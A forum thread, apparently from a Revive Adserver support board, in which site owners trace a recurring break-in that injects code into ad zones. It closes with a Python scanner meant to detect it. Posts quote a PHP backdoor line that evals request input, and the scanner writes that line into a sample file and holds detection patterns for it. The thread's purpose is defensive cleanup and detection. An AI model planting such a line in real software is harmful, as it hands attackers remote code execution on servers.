Posts posted by TYWebmaster

  1. This time last year I was able to add this code into Generic HTML Banner <script type="text/javascript" src="https://voken.eyereturn.com/j4/js?7935671"></script>

    Once I set the size it would pull in the banner info into Revive and be able to serve the banners and allow the 3rd party tracking. What has changed in the last updates? Can anyone shed some light on this please?

  2. 1 minute ago, andrewatfornax said:

    Either that or at the O/S level - but if you are on a hosting service that only offers Plesk access, you may not be able to tell. It would be worth asking your hosting provider to check for unexpected accounts or activity at the O/S level, though, just to be sure.

    I will do that. Is there anything else you can suggest? Any other ways to possibly block them from injecting the code in the prepend?

  3. 5 minutes ago, andrewatfornax said:

    Hi @TYWebmaster,

    Thanks for this information - can you please confirm if in addition to changing the database user password and Revive Adserver admin login password:

    • Did you change all other DB user account passwords that may exist? Are there any DB user accounts present that you don't recognise?
    • Did you change all other Revive Adserver login passwords that may exist? Are there any logins that you don't recognise?
    • Did you change all other O/S level account passwords that may exist? Are there any O/S level accounts present that you don't recognise?

    Thanks,

    Andrew

    There is only one DB user account to log into, and there is only one Revive login account; all others are deleted. I am using Plesk to manage multiple sites, so are you referring to another possible PW to log into phpMyAdmin?

  4. 9 hours ago, Matteo Beccati said:

    Research is still ongoing: we are in touch with a few affected users, but until now we haven't received enough evidence to understand how the malicious plugin or the php files in the images folder are being planted.

    I know this may sound crazy, but I think however they have hacked in, they now have access to the DB or there is something in the DB that's giving them access. I have removed the line from genericText.delivery.php, turned off the ability to use PHP in the image folder, removed any PHP files from the image folder, went into the database and varchar(0) the prepend/append in the zones and banners, changed the password for the DB and the Site Admin, and 12 hrs later the attack is back: the varchar is changed back to text in the prepend and 3 of my zones have code added back.

    I really need to know how to at least lock them out from adding that code. So far all the recommendations have been done and it's still coming back.

    I would be willing to let your team take a look at our ads server and DB at any time if it will help this get resolved.

  5. 4 hours ago, tvvpmi said:

    If prepend/append zones are varchar(0), they can't insert code there for sure. Check if the code is inserted in prepend/append fields of the banners table. As I posted before, if the injection is done using the same strategy, you can stop it by making the file "plugins/bannerTypeText/oxText/genericText.delivery.php" read only. Another good measure is to disable PHP execution on the delivery images folder.

    If I make the file "plugins/bannerTypeText/oxText/genericText.delivery.php" read only then I get errors when I log in.

  6. On 1/18/2019 at 10:37 AM, franciscomesa said:

    Same problem at one installation with ReviveAds 4.1.4.

    The first time the "hacker" only changed one zone. I removed the prepend code and also disabled the check box. But it returns.
    The second time it changed the same.
    The third time it changed all zones. I updated the database to varchar(0) and now it's fine. The file "genericText.delivery.php" has the line "if(isset($_REQUEST['oxText'])&&$_REQUEST['oxText']=='b0087003d2f3006f6623adf6c520462b'){@eval($_REQUEST['zoneId']);}". Removed.

    Tried to check logs but can't find how/where/when it's changing the set.

    Has any of this been resolved? How are they getting back into the DB and making changes? I had varchar(0) on append/prepend on all zones and today it's been changed back and the code is back in the Zones.

  7. On 1/9/2019 at 5:07 AM, tvvpmi said:

    Hi @vinmhas, I was in the same situation. You should review your file: plugins/bannerTypeText/oxText/genericText.delivery.php

    Probably it has been modified, adding a line like this at the end:

    if(isset($_REQUEST['oxText'])&&md5($_REQUEST['oxText'])=='2817bce4ce1ba4d9361f5f24cf33747f'){@eval($_REQUEST['zoneId']);}

    You have to remove it.

    Also you have to search in the "images folder" for some PHP script ... and remove it. Perhaps you can send it privately to @Ian vM

    Clean the prepend code of your zones ... via SQL or through the Revive backend. Search for iframes and JavaScript code.

    Disable PHP execution on the image folder or move the image folder to "another place", as they are static files, and serve them through another subdomain. You don't need PHP for them.

    I have tried all this and somehow they are still getting on my system altering the Append/Prepend even after I have turned it off in the DB, please help!!
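
The checks suggested in the posts above (the eval line in the delivery plugin, PHP files in the images folder, script or iframe markup in prepend/append values), as an added Python example that is not part of the thread or of Revive Adserver's own code. The `images` path, the `(table, id, prepend, append)` row layout and the sample tree are assumptions constructed for the demonstration.

```python
import re
import tempfile
from pathlib import Path

# eval()/assert() fed straight from a request superglobal, the shape of the line quoted in the thread
BACKDOOR_RE = re.compile(r"\b(?:eval|assert)\s*\(\s*\$_(?:REQUEST|GET|POST|COOKIE)\b", re.I)
# Extensions a web server commonly hands to the PHP interpreter
SCRIPT_EXT_RE = re.compile(r"\.(?:php\d?|phtml|phar)$", re.I)
# Markup worth reviewing in prepend/append values (legitimate tags can match too)
MARKUP_RE = re.compile(r"<\s*(?:script|iframe)\b", re.I)

def scan_plugins(root):
    """Return (relative path, line number) for each plugin PHP line matching BACKDOOR_RE."""
    hits = []
    for path in sorted(Path(root, "plugins").rglob("*.php")):
        lines = path.read_text(errors="replace").splitlines()
        hits += [(path.relative_to(root).as_posix(), n)
                 for n, line in enumerate(lines, 1) if BACKDOOR_RE.search(line)]
    return hits

def scan_images(images_dir):
    """Return script files sitting in a folder that should hold only static images."""
    return sorted(p.relative_to(images_dir).as_posix() for p in Path(images_dir).rglob("*")
                  if p.is_file() and SCRIPT_EXT_RE.search(p.name))

def scan_rows(rows):
    """rows: (table, id, prepend, append) tuples exported from the database."""
    return [(t, i) for t, i, pre, app in rows
            if MARKUP_RE.search(pre or "") or MARKUP_RE.search(app or "")]

def build_sample(root):
    """Constructed sample tree; the backdoor line is the one quoted in the thread."""
    plugin = Path(root, "plugins/bannerTypeText/oxText")
    images = Path(root, "images")  # assumed location of the delivery images folder
    plugin.mkdir(parents=True)
    images.mkdir()
    (plugin / "genericText.delivery.php").write_text(
        "<?php\n// delivery code\n"
        "if(isset($_REQUEST['oxText'])&&md5($_REQUEST['oxText'])=="
        "'2817bce4ce1ba4d9361f5f24cf33747f'){@eval($_REQUEST['zoneId']);}\n")
    (images / "banner.png").write_bytes(b"\x89PNG")
    (images / "cache.php").write_text("<?php // constructed placeholder\n")
    return images

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        images = build_sample(tmp)
        rows = [("zones", 1, "", ""), ("zones", 2, "<script src='//x.invalid/a.js'></script>", None)]
        print(scan_plugins(tmp), scan_images(images), scan_rows(rows))
```

Hits from `scan_rows` need manual review, since a legitimate third-party tag placed in prepend/append matches the same pattern.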
